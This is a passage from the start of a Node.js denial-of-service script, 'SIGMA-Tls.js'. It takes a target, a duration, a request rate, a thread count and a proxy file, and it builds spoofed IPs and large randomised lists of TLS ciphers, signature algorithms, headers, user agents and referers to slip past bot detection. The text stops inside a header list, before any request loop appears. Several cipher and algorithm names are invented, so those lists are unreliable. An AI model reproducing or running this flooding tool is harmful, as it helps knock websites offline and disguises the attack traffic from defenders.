 const net = require("net");
 const http2 = require("http2");
 const tls = require("tls");
 const cluster = require("cluster");
 const url = require("url");
 const crypto = require("crypto");
 const fakeua = require('fake-useragent');
 const fs = require("fs");

 process.setMaxListeners(0);
 require("events").EventEmitter.defaultMaxListeners = 0;
 process.on('uncaughtException', function (exception) {
  });

 if (process.argv.length < 7){console.log(`METHODS BY : SIGMA: node SIGMA-Tls.js target Time rps theard Proxy.txt`); process.exit();}
 const headers = {};
  function readLines(filePath) {
     return fs.readFileSync(filePath, "utf-8").toString().split(/\r?\n/);
 }
 
 function randomIntn(min, max) {
     return Math.floor(Math.random() * (max - min) + min);
 }
 
 function randomElement(elements) {
     return elements[randomIntn(0, elements.length)];
 } 
 
 function randstr(length) {
   const characters =
     "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
   let result = "";
   const charactersLength = characters.length;
   for (let i = 0; i < length; i++) {
     result += characters.charAt(Math.floor(Math.random() * charactersLength));
   }
   return result;
 }
 
 const ip_spoof = () => {
   const getRandomByte = () => {
     return Math.floor(Math.random() * 255);
   };
   return `${getRandomByte()}.${getRandomByte()}.${getRandomByte()}.${getRandomByte()}`;
 };
 
 const spoofed = ip_spoof();

 const ip_spoof2 = () => {
   const getRandomByte = () => {
     return Math.floor(Math.random() * 9999);
   };
   return `${getRandomByte()}`;
 };
 
 const spoofed2 = ip_spoof2();

 const ip_spoof1 = () => {
   const getRandomByte = () => {
     return Math.floor(Math.random() * 50000);
   };
   return `${getRandomByte()}`;
 };
 
 const spoofed1 = ip_spoof1();
 
 const args = {
     target: process.argv[2],
     time: parseInt(process.argv[3]),
     Rate: parseInt(process.argv[4]),
     threads: parseInt(process.argv[5]),
     proxyFile: process.argv[6]
 }
 const sig = [    
    'ecdsa_secp256r1_sha256',
    'ecdsa_secp384r1_sha384',
    'ecdsa_secp521r1_sha512',
    'rsa_pss_rsae_sha256',
    'rsa_pss_rsae_sha384',
    'rsa_pss_rsae_sha512',
    'rsa_pkcs1_sha256',
    'rsa_pkcs1_sha384',
    'rsa_pkcs1_sha512',
    'ecdsa_secp256k1_sha256',
    'ecdsa_secp256k1_sha384',
    'ecdsa_secp256k1_sha512',
    'ecdsa_secp384k1_sha256',
    'ecdsa_secp384k1_sha384',
    'ecdsa_secp384k1_sha512',
    'ecdsa_secp521k1_sha256',
    'ecdsa_secp521k1_sha384',
    'ecdsa_secp521k1_sha512',
    'rsa_pss_rsae_sha256_1',
    'rsa_pss_rsae_sha384_1',
    'rsa_pss_rsae_sha512_1',
    'rsa_pss_rsae_sha256_2',
    'rsa_pss_rsae_sha384_2',
    'rsa_pss_rsae_sha512_2',
    'rsa_pkcs1_sha256_1',
    'rsa_pkcs1_sha384_1',
    'rsa_pkcs1_sha512_1',
    'rsa_pkcs1_sha256_2',
    'rsa_pkcs1_sha384_2',
    'rsa_pkcs1_sha512_2',
    'dsa_sha256',
    'dsa_sha384',
    'dsa_sha512',
    'ed25519',
    'ed448',
    'x25519',
    'x448',
    'ecdsa_secp192r1_sha256',
    'ecdsa_secp224r1_sha256',
    'ecdsa_secp224r1_sha384',
    'ecdsa_secp224r1_sha512',
    'ecdsa_secp192r1_sha384',
    'ecdsa_secp192r1_sha512',
    'ecdsa_secp224r1_sha256_1',
    'ecdsa_secp192r1_sha256_1',
    'ecdsa_secp521r1_sha256',
    'ecdsa_secp521r1_sha384',
    'ecdsa_secp521r1_sha512',
    'rsa_pss_rsae_sha256_v2',
    'rsa_pss_rsae_sha384_v2',
    'rsa_pss_rsae_sha512_v2',
    'rsa_pkcs1_sha256_v2',
    'rsa_pkcs1_sha384_v2',
    'rsa_pkcs1_sha512_v2'
    // ...repeat similar patterns or add variations
];
 const sigalgs1 = sig.join(':');
 const cplist = [
    "ECDHE-ECDSA-AES128-GCM-SHA256", 
    "ECDHE-ECDSA-CHACHA20-POLY1305", 
    "ECDHE-RSA-AES128-GCM-SHA256", 
    "ECDHE-RSA-CHACHA20-POLY1305", 
    "ECDHE-ECDSA-AES256-GCM-SHA384", 
    "ECDHE-RSA-AES256-GCM-SHA384",
    "ECDHE-ECDSA-AES128-CCM-SHA256",
    "ECDHE-ECDSA-AES128-CCM-SHA384",
    "ECDHE-ECDSA-AES128-CBC-SHA256",
    "ECDHE-ECDSA-AES256-CBC-SHA384",
    "ECDHE-RSA-AES128-CCM-SHA256",
    "ECDHE-RSA-AES128-CCM-SHA384",
    "ECDHE-RSA-AES128-CBC-SHA256",
    "ECDHE-RSA-AES256-CBC-SHA384",
    "ECDHE-ECDSA-AES128-GCM-SHA512",
    "ECDHE-RSA-AES128-GCM-SHA512",
    "ECDHE-ECDSA-CHACHA20-POLY1305-SHA256",
    "ECDHE-RSA-CHACHA20-POLY1305-SHA384",
    "ECDHE-RSA-AES128-CCM-SHA256-v2",
    "ECDHE-RSA-AES128-GCM-SHA256-v2",
    "ECDHE-ECDSA-AES128-CCM-SHA384-v2",
    "ECDHE-ECDSA-AES256-GCM-SHA256",
    "ECDHE-ECDSA-AES256-GCM-SHA512",
    "ECDHE-RSA-AES256-GCM-SHA512",
    "ECDHE-RSA-AES256-CBC-SHA256",
    "ECDHE-RSA-CHACHA20-POLY1305-SHA512",
    "ECDHE-ECDSA-CHACHA20-POLY1305-SHA512",
    "ECDHE-ECDSA-AES128-GCM-SHA384-v2",
    "ECDHE-RSA-AES128-GCM-SHA384-v2",
    "ECDHE-ECDSA-AES256-CCM-SHA256",
    "ECDHE-ECDSA-AES256-CCM-SHA384",
    "ECDHE-RSA-AES256-CCM-SHA256",
    "ECDHE-RSA-AES256-CCM-SHA384",
    "ECDHE-ECDSA-CHACHA20-POLY1305-SHA256-v2",
    "ECDHE-RSA-CHACHA20-POLY1305-SHA256-v2",
    "ECDHE-ECDSA-AES128-CCM-SHA256-v3",
    "ECDHE-RSA-AES128-CCM-SHA256-v3",
    "ECDHE-ECDSA-AES128-CBC-SHA256-v2",
    "ECDHE-RSA-AES128-CBC-SHA384-v2",
    "ECDHE-ECDSA-AES256-GCM-SHA384-v3",
    "ECDHE-RSA-AES256-GCM-SHA384-v3",
    "ECDHE-ECDSA-CHACHA20-POLY1305-SHA256-v3",
    "ECDHE-RSA-CHACHA20-POLY1305-SHA256-v3"
    // ...repeat patterns to add more combinations
];
 const accept_header = [
    '*/*',
    'image/*',
    'image/webp,image/apng',
    'text/html',
    'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
    'image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.8',
    'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
    'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
    'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
    'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
    'application/json',
    'application/xml',
    'text/plain',
    'text/css',
    'application/javascript',
    'text/javascript',
    'application/json;q=0.9,text/html;q=0.8,*/*;q=0.7',
    'application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
    'image/png,image/webp,image/apng',
    'image/svg+xml',
    'image/jpeg,image/png,image/webp',
    'application/json,application/xml;q=0.9,text/html;q=0.8,*/*;q=0.7',
    'text/html,application/xhtml+xml;q=0.9,image/webp,*/*;q=0.8',
    'application/x-www-form-urlencoded',
    'application/json,text/plain',
    'application/xml,text/plain',
    'image/png,*/*;q=0.8,image/jpeg',
    'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'application/json,*/*;q=0.8',
    'text/html,application/xhtml+xml;q=0.9,image/webp,*/*;q=0.8',
    'application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'text/html,application/xhtml+xml;q=0.9,*/*;q=0.8',
    'application/xml,text/html;q=0.9',
    'application/json,application/xml;q=0.9,*/*;q=0.8',
    'application/json,text/html;q=0.9,*/*;q=0.8',
    'application/xml,text/html;q=0.9,image/webp,*/*;q=0.8',
];

 const lang_header = [
  'ko-KR',
  'en-US',
  'zh-CN',
  'zh-TW',
  'ja-JP',
  'en-GB',
  'en-AU',
  'en-GB,en-US;q=0.9,en;q=0.8',
  'en-GB,en;q=0.5',
  'en-CA',
  'en-UK, en, de;q=0.5',
  'en-NZ',
  'en-GB,en;q=0.6',
  'en-ZA',
  'en-IN',
  'en-PH',
  'en-SG',
  'en-HK',
  'en-GB,en;q=0.8',
  'en-GB,en;q=0.9',
  'en-GB,en;q=0.7',
  'fr-FR',
  'de-DE',
  'es-ES',
  'it-IT',
  'pt-PT',
  'nl-NL',
  'ru-RU',
  'pl-PL',
  'tr-TR',
  'da-DK',
  'sv-SE',
  'no-NO',
  'fi-FI',
  'cs-CZ',
  'sk-SK',
  'hu-HU',
  'ro-RO',
  'el-GR',
  'he-IL',
  'ar-SA',
  'ar-EG',
  'ur-PK',
  'hi-IN',
  'bn-BD',
  'ta-IN',
  'mr-IN',
  'te-IN',
  'ml-IN',
  'kn-IN',
  'pa-IN',
  'gu-IN',
  'or-IN',
  'ne-NP',
  'si-LK',
  'km-KH',
  'lo-LA',
  'th-TH',
  'vi-VN',
  'id-ID',
  'ms-MY',
  'fil-PH',
  'bn-IN',
  'zh-HK',
  'zh-SG',
  'ja-JP,en-US;q=0.9,en;q=0.8',
  'ko-KR,en-US;q=0.9,en;q=0.8',
  'zh-CN,en-US;q=0.9,en;q=0.8',
  'en-GB,en;q=0.8',
  'en-US,en;q=0.7',
  'fr-CA',
  'de-CH',
  'it-CH',
  'pt-BR',
  'es-MX',
  'es-AR',
  'en-IN,en;q=0.8',
  'fr-BE',
  'nl-BE',
  'pt-BR,en-US;q=0.9',
  'en-GB,en;q=0.9',
  'it-IT,en-US;q=0.7',
  'de-DE,en;q=0.7',
  'en-CA,en;q=0.9',
  'ko-KR,en;q=0.8',
  'ja-JP,en;q=0.6',
  'zh-CN,en;q=0.7',
  'zh-TW,en;q=0.8',
  'fr-FR,en;q=0.9',
  'de-DE,en;q=0.9',
  'es-ES,en;q=0.8',
  'it-IT,en;q=0.9',
  'pl-PL,en;q=0.9',
  'nl-NL,en;q=0.8',
  'ru-RU,en;q=0.8',
  'tr-TR,en;q=0.8',
  'sv-SE,en;q=0.9',
  'da-DK,en;q=0.7',
  'no-NO,en;q=0.8',
  'fi-FI,en;q=0.7',
  'cs-CZ,en;q=0.9',
  'sk-SK,en;q=0.6',
  'hu-HU,en;q=0.9',
  'ro-RO,en;q=0.8',
  'el-GR,en;q=0.7',
  'he-IL,en;q=0.9',
  'ar-SA,en;q=0.6',
  'ar-EG,en;q=0.7',
  'ur-PK,en;q=0.8',
  'hi-IN,en;q=0.9',
  'bn-BD,en;q=0.7',
  'ta-IN,en;q=0.9',
  'mr-IN,en;q=0.8',
  'te-IN,en;q=0.9',
  'ml-IN,en;q=0.8',
  'kn-IN,en;q=0.8',
  'pa-IN,en;q=0.7',
  'gu-IN,en;q=0.9',
  'or-IN,en;q=0.9',
  'ne-NP,en;q=0.8',
  'si-LK,en;q=0.7',
  'km-KH,en;q=0.9',
  'lo-LA,en;q=0.8',
  'th-TH,en;q=0.9',
  'vi-VN,en;q=0.7',
  'id-ID,en;q=0.8',
  'ms-MY,en;q=0.9',
  'fil-PH,en;q=0.7',
  'bn-IN,en;q=0.6',
  'zh-HK,en;q=0.9',
  'zh-SG,en;q=0.8',
  'ja-JP,en;q=0.8',
  'ko-KR,en;q=0.9',
  'zh-CN,en;q=0.9',
  'zh-TW,en;q=0.7',
  'fr-FR,en;q=0.8',
  'de-DE,en;q=0.9',
  'es-ES,en;q=0.8',
  'it-IT,en;q=0.7',
  'pl-PL,en;q=0.7',
  'ru-RU,en;q=0.8',
  'tr-TR,en;q=0.9',
  'sv-SE,en;q=0.9',
  'da-DK,en;q=0.7',
  'no-NO,en;q=0.9',
  'fi-FI,en;q=0.7',
  'cs-CZ,en;q=0.7',
  'sk-SK,en;q=0.6',
  'hu-HU,en;q=0.9',
  'ro-RO,en;q=0.8',
  'el-GR,en;q=0.7',
  'he-IL,en;q=0.9',
  'ar-SA,en;q=0.6',
  'ar-EG,en;q=0.7',
  'ur-PK,en;q=0.8',
  'hi-IN,en;q=0.9',
  'bn-BD,en;q=0.7',
  'ta-IN,en;q=0.9',
  'mr-IN,en;q=0.8',
  'te-IN,en;q=0.9',
  'ml-IN,en;q=0.8',
  'kn-IN,en;q=0.8',
  'pa-IN,en;q=0.7',
  'gu-IN,en;q=0.9',
  'or-IN,en;q=0.9',
  'ne-NP,en;q=0.8',
  'si-LK,en;q=0.7',
  'km-KH,en;q=0.9',
  'lo-LA,en;q=0.8',
  'th-TH,en;q=0.9',
  'vi-VN,en;q=0.7',
  'id-ID,en;q=0.8',
  'ms-MY,en;q=0.9',
  'fil-PH,en;q=0.7',
  'bn-IN,en;q=0.6',
  'zh-HK,en;q=0.9',
  'zh-SG,en;q=0.8',
  'ja-JP,en;q=0.7',
  'ko-KR,en;q=0.9',
  'zh-CN,en;q=0.9',
  'zh-TW,en;q=0.8',
  'fr-FR,en;q=0.9',
  'de-DE,en;q=0.8',
  'es-ES,en;q=0.9',
  'it-IT,en;q=0.7',
  'pl-PL,en;q=0.7',
  'ru-RU,en;q=0.8',
  'tr-TR,en;q=0.9',
  'sv-SE,en;q=0.8',
  'da-DK,en;q=0.9',
  'no-NO,en;q=0.7',
  'fi-FI,en;q=0.9',
  'cs-CZ,en;q=0.9',
  'sk-SK,en;q=0.8',
  'hu-HU,en;q=0.9',
  'ro-RO,en;q=0.8',
  'el-GR,en;q=0.8',
  'he-IL,en;q=0.9',
  'ar-EG,en;q=0.8',
  'ur-PK,en;q=0.7',
  'hi-IN,en;q=0.8',
  'bn-BD,en;q=0.9',
  'ta-IN,en;q=0.7',
  'mr-IN,en;q=0.9',
  'te-IN,en;q=0.8',
  'ml-IN,en;q=0.9',
  'kn-IN,en;q=0.7',
  'pa-IN,en;q=0.8',
  'gu-IN,en;q=0.7',
  'or-IN,en;q=0.8',
  'ne-NP,en;q=0.7',
  'si-LK,en;q=0.8',
  'km-KH,en;q=0.7',
  'lo-LA,en;q=0.9',
  'th-TH,en;q=0.8',
  'vi-VN,en;q=0.9',
  'id-ID,en;q=0.7',
  'ms-MY,en;q=0.8',
  'fil-PH,en;q=0.9',
  'bn-IN,en;q=0.7',
  'zh-HK,en;q=0.8',
  'zh-SG,en;q=0.7',
  'ja-JP,en;q=0.9',
  'ko-KR,en;q=0.8',
  'zh-CN,en;q=0.8',
  'zh-TW,en;q=0.9',
  'fr-FR,en;q=0.7',
  'de-DE,en;q=0.6',
  'es-ES,en;q=0.7',
  'it-IT,en;q=0.8',
  'pl-PL,en;q=0.9',
  'ru-RU,en;q=0.7',
  'tr-TR,en;q=0.7',
  'sv-SE,en;q=0.7',
  'da-DK,en;q=0.8',
  'no-NO,en;q=0.9',
  'fi-FI,en;q=0.8',
  'cs-CZ,en;q=0.6',
  'sk-SK,en;q=0.7',
  'hu-HU,en;q=0.6',
  'ro-RO,en;q=0.7',
  'el-GR,en;q=0.8',
  'he-IL,en;q=0.8',
  'ar-SA,en;q=0.8',
  'ar-EG,en;q=0.7',
  'ur-PK,en;q=0.6',
  'hi-IN,en;q=0.7',
  'bn-BD,en;q=0.8',
  'ta-IN,en;q=0.6',
  'mr-IN,en;q=0.7',
  'te-IN,en;q=0.9',
  'ml-IN,en;q=0.7',
  'kn-IN,en;q=0.9',
  'pa-IN,en;q=0.9',
  'gu-IN,en;q=0.8',
  'or-IN,en;q=0.7',
  'ne-NP,en;q=0.9',
  'si-LK,en;q=0.9',
  'km-KH,en;q=0.8',
  'lo-LA,en;q=0.7',
  'th-TH,en;q=0.7',
  'vi-VN,en;q=0.8',
  'id-ID,en;q=0.6',
  'ms-MY,en;q=0.7',
  'fil-PH,en;q=0.6',
  'bn-IN,en;q=0.9',
  'zh-HK,en;q=0.9',
  'zh-SG,en;q=0.6',
  'ja-JP,en;q=0.6',
  'ko-KR,en;q=0.9',
  'zh-CN,en;q=0.9',
  'zh-TW,en;q=0.8',
  'fr-FR,en;q=0.8',
  'de-DE,en;q=0.7',
  'es-ES,en;q=0.6',
  'it-IT,en;q=0.6',
  'pl-PL,en;q=0.7',
  'ru-RU,en;q=0.9',
  'tr-TR,en;q=0.6',
  'sv-SE,en;q=0.9',
  'da-DK,en;q=0.8',
  'no-NO,en;q=0.6',
  'fi-FI,en;q=0.9',
  'cs-CZ,en;q=0.7',
  'sk-SK,en;q=0.9',
  'hu-HU,en;q=0.8',
  'ro-RO,en;q=0.6',
  'el-GR,en;q=0.6',
  'he-IL,en;q=0.7',
  'ar-SA,en;q=0.9',
  'ar-EG,en;q=0.6',
  'ur-PK,en;q=0.8',
  'hi-IN,en;q=0.8',
  'bn-BD,en;q=0.6',
  'ta-IN,en;q=0.7',
  'mr-IN,en;q=0.6',
  'te-IN,en;q=0.8',
  'ml-IN,en;q=0.7',
  'kn-IN,en;q=0.9',
  'pa-IN,en;q=0.9',
  'gu-IN,en;q=0.9',
  'or-IN,en;q=0.8',
  'ne-NP,en;q=0.8',
  'si-LK,en;q=0.8',
  'km-KH,en;q=0.7',
  'lo-LA,en;q=0.9',
  'th-TH,en;q=0.8',
  'vi-VN,en;q=0.8',
  'id-ID,en;q=0.9',
  'ms-MY,en;q=0.8',
  'fil-PH,en;q=0.7',
  'bn-IN,en;q=0.7',
  'zh-HK,en;q=0.8',
  'zh-SG,en;q=0.7',
  'ja-JP,en;q=0.9',
  'ko-KR,en;q=0.9',
  'zh-CN,en;q=0.9',
  'zh-TW,en;q=0.7',
  'fr-FR,en;q=0.8',
  'de-DE,en;q=0.7',
  'es-ES,en;q=0.9',
  'it-IT,en;q=0.9',
  'pl-PL,en;q=0.7',
  'ru-RU,en;q=0.8',
  'tr-TR,en;q=0.8',
  'sv-SE,en;q=0.7',
  'da-DK,en;q=0.9',
  'no-NO,en;q=0.8',
  'fi-FI,en;q=0.8',
  'cs-CZ,en;q=0.9',
  'sk-SK,en;q=0.7',
  'hu-HU,en;q=0.6',
  'ro-RO,en;q=0.9',
  'el-GR,en;q=0.8',
  'he-IL,en;q=0.9',
  'ar-SA,en;q=0.7'
];
 
 const encoding_header = [
  'gzip, deflate, br',
  'deflate',
  'gzip, deflate, lzma, sdch',
  'deflate'
 ];
 
 const control_header = ["no-cache", "max-age=0"];
 
 const refers = [
     "https://www.google.com/",
     "https://www.facebook.com/",
     "https://www.twitter.com/",
     "https://www.youtube.com/",
     "https://www.linkedin.com/",
     "https://proxyscrape.com/",
     "https://www.instagram.com/",
     "https://wwww.reddit.com/",
     "https://fivem.net/",
     "https://www.fbi.gov/",
     "https://nettruyenplus.com/",
     "https://vnexpress.net/",
     "https://zalo.me",
     "https://shopee.vn",
     "https://www.tiktok.com/",
     "https://google.com.vn/",
     "https://tuoitre.vn/",
     "https://thanhnien.vn/",
     "https://nettruyento.com/"
 ];
 const defaultCiphers = crypto.constants.defaultCoreCipherList.split(":");
 const ciphers1 = "GREASE:" + [
     defaultCiphers[2],
     defaultCiphers[1],
     defaultCiphers[0],
     ...defaultCiphers.slice(3)
 ].join(":");
 
 const uap = [
     "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36",
     "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36",
     "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36",
     "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36",
     "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36",
     "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36",
     "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36",
     "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36",
     "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36",
     "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36",
     "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/37.0.2062.94 Chrome/37.0.2062.94 Safari/537.36",
     "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36",
     "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
     "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0",
     "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko) Version/8.0.8 Safari/600.8.9",
     "Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4",
     "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36",
     "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36",
     "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240",
     "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0",
     "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko",
     "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36",
     "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko",
     "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0",
     "Mozilla/5.0 (Linux; Android 12; V2120 Build/SP1A.210812.003; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/108.0.5359.128 Mobile Safari/537.36"
 ];

 version = [
    '"Chromium";v="100", "Google Chrome";v="100"',
    '"(Not(A:Brand";v="8", "Chromium";v="98"',
    '" Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"',
    '"Not_A Brand";v="8", "Google Chrome";v="109", "Chromium";v="109"',
    '"Not_A Brand";v="99", "Google Chrome";v="86", "Chromium";v="86"',
    '"Not_A Brand";v="99", "Google Chrome";v="96", "Chromium";v="96"',
    '"Not A;Brand";v="99", "Chromium";v="96", "Microsoft Edge";v="96"',
    '"Chromium";v="120", "Google Chrome";v="120"',
    '"Not_A Brand";v="99", "Google Chrome";v="105", "Chromium";v="105"',
    '"Not A;Brand";v="110", "Google Chrome";v="110", "Chromium";v="110"',
    '"Not_A Brand";v="100", "Google Chrome";v="100", "Chromium";v="100"',
    '"Not_A Brand";v="8", "Google Chrome";v="113", "Chromium";v="113"',
    '"Not_A Brand";v="99", "Google Chrome";v="104", "Chromium";v="104"',
    '"Not A;Brand";v="99", "Google Chrome";v="92", "Chromium";v="92"',
    '"Not_A Brand";v="99", "Google Chrome";v="101", "Chromium";v="101"',
    '"Not_A Brand";v="99", "Google Chrome";v="103", "Chromium";v="103"',
    '"Not_A Brand";v="99", "Google Chrome";v="108", "Chromium";v="108"',
    '"Not_A Brand";v="8", "Google Chrome";v="95", "Chromium";v="95"',
    '"Not_A Brand";v="100", "Google Chrome";v="102", "Chromium";v="102"',
    '"Not_A Brand";v="99", "Google Chrome";v="90", "Chromium";v="90"'
];

platform = [
    'Linux',
    'macOS',
    'Windows',
    'Android',
    'iOS',
    'ChromeOS',
    'Unix',
    'FreeBSD',
    'OpenBSD',
    'SunOS',
    'Darwin',
    'AIX',
    'IBM AIX',
    'HP-UX',
    'NetBSD',
    'BeOS',
    'OS/2',
    'Windows NT',
    'Windows 10',
    'Windows 7',
    'Windows 8',
    'Windows Vista',
    'Windows XP',
    'Windows 11',
    'Linux Mint',
    'Ubuntu',
    'Debian',
    'Fedora',
    'Red Hat Linux',
    'CentOS',
    'Arch Linux',
    'Kali Linux',
    'Raspberry Pi OS',
    'Manjaro',
    'Slackware',
    'SUSE Linux',
    'openSUSE',
    'Elementary OS',
    'Zorin OS',
    'Pop!_OS',
    'Deepin',
    'MX Linux',
    'Tails',
    'SteamOS',
    'Android 10',
    'Android 11',
    'Android 12',
    'Android 13',
    'Android 14',
    'iOS 14',
    'iOS 15',
    'iOS 16',
    'iOS 17',
    'Chrome OS',
    'Ubuntu Server',
    'ArchBang',
    'Bodhi Linux',
    'Puppy Linux',
    'Peppermint OS',
    'Linux Lite',
    'BunsenLabs Linux',
    'Lubuntu',
    'Xubuntu',
    'Kubuntu',
    'Kali Linux 2020',
    'Kali Linux 2021',
    'Ubuntu 20.04',
    'Ubuntu 22.04',
    'Fedora 33',
    'Fedora 34',
    'Fedora 35',
    'Fedora 36',
    'Manjaro 21',
    'Manjaro 22',
    'Debian 11',
    'Debian 10',
    'OpenSUSE Leap 15',
    'OpenSUSE Tumbleweed',
    'Windows Server 2019',
    'Windows Server 2022',
    'Ubuntu MATE',
    'Ubuntu Budgie',
    'Ubuntu Studio',
    'Ubuntu Server',
    'Zorin OS 15',
    'Zorin OS 16',
    'Pop!_OS 21',
    'Pop!_OS 22',
    'CentOS 8',
    'CentOS 7',
    'Kali Linux 2022',
    'Linux Mint 20',
    'Linux Mint 21',
    'Mac OS X',
    'macOS Big Sur',
    'macOS Monterey',
    'macOS Ventura',
    'macOS Sonoma',
    'macOS Catalina',
    'Windows 10 Pro',
    'Windows 11 Pro',
    'Windows 7 Home Premium',
    'Windows XP Professional',
    'Windows 8.1',
    'Windows 8 Pro',
    'Windows Vista Ultimate',
    'Ubuntu 18.04',
    'Ubuntu 18.10',
    'Fedora 29',
    'Fedora 30',
    'Fedora 31',
    'Debian 9',
    'Debian 8',
    'Red Hat Enterprise Linux 7',
    'Red Hat Enterprise Linux 8',
    'Oracle Linux 7',
    'Oracle Linux 8',
    'openSUSE Leap 42',
    'openSUSE Leap 15.3',
    'ChromeOS 89',
    'ChromeOS 90',
    'ChromeOS 91',
    'ChromeOS 92',
    'ChromeOS 93',
    'ChromeOS 94',
    'ChromeOS 95',
    'ChromeOS 96',
    'Windows 10 Education',
    'Windows 10 Enterprise',
    'Windows 10 Home',
    'Mac OS 9',
    'Mac OS X 10.4',
    'Mac OS X 10.5',
    'Mac OS X 10.6',
    'Mac OS X 10.7',
    'Mac OS X 10.8',
    'Mac OS X 10.9',
    'Mac OS X 10.10',
    'Mac OS X 10.11',
    'macOS 10.13',
    'macOS 10.14',
    'macOS 10.15',
    'macOS 11',
    'macOS 12',
    'macOS 13',
    'Android 6.0 Marshmallow',
    'Android 7.0 Nougat',
    'Android 8.0 Oreo',
    'Android 9.0 Pie',
    'Android 10 Q',
    'Android 11 R',
    'Android 12 S',
    'Android 13 T',
    'Linux Mint 18',
    'Linux Mint 19',
    'Windows 7 Ultimate',
    'Windows 7 Professional',
    'Windows Server 2008',
    'Windows Server 2012',
    'Windows Server 2016',
    'Windows Server 2012 R2',
    'Red Hat 6',
    'Red Hat 7',
    'Ubuntu 16.04',
    'Ubuntu 14.04',
    'Ubuntu 13.10',
    'Ubuntu 12.04',
    'Debian 7',
    'Debian 6',
    'Fedora 28',
    'Fedora 27',
    'Fedora 26',
    'Fedora 25',
    'Debian 5',
    'Debian 4',
    'Debian 3',
    'Raspbian',
    'Raspberry Pi OS 2020',
    'Raspberry Pi OS 2021',
    'Xubuntu 20.04',
    'Xubuntu 22.04',
    'Kubuntu 20.04',
    'Kubuntu 22.04',
    'Lubuntu 20.04',
    'Lubuntu 22.04',
    'Manjaro 20',
    'Manjaro 21.1',
    'Ubuntu Server 18.04',
    'Ubuntu Server 20.04',
    'Ubuntu Server 22.04',
    'Linux Mint 18.3',
    'Linux Mint 19.3',
    'Pop!_OS 20.04',
    'Pop!_OS 21.10',
    'Windows RT',
    'Windows Phone 8.1',
    'Windows Phone 7',
    'macOS High Sierra',
    'macOS Mojave'
];
  
site = [
    'cross-site',
    'same-origin',
    'same-site',
    'none',
    'local',
    'trusted',
    'untrusted',
    'external',
    'internal',
    'private',
    'public',
    'restricted',
    'open',
    'secure',
    'http',
    'https',
    'file',
    'ftp',
    'ws',
    'wss',
    'localhost',
    'dev',
    'staging',
    'production',
    'preproduction',
    'test',
    'demo',
    'example',
    'api',
    'cdn',
    'content',
    'assets',
    'images',
    'videos',
    'data',
    'scripts',
    'services',
    'webmail',
    'blog',
    'news',
    'forum',
    'forum-topic',
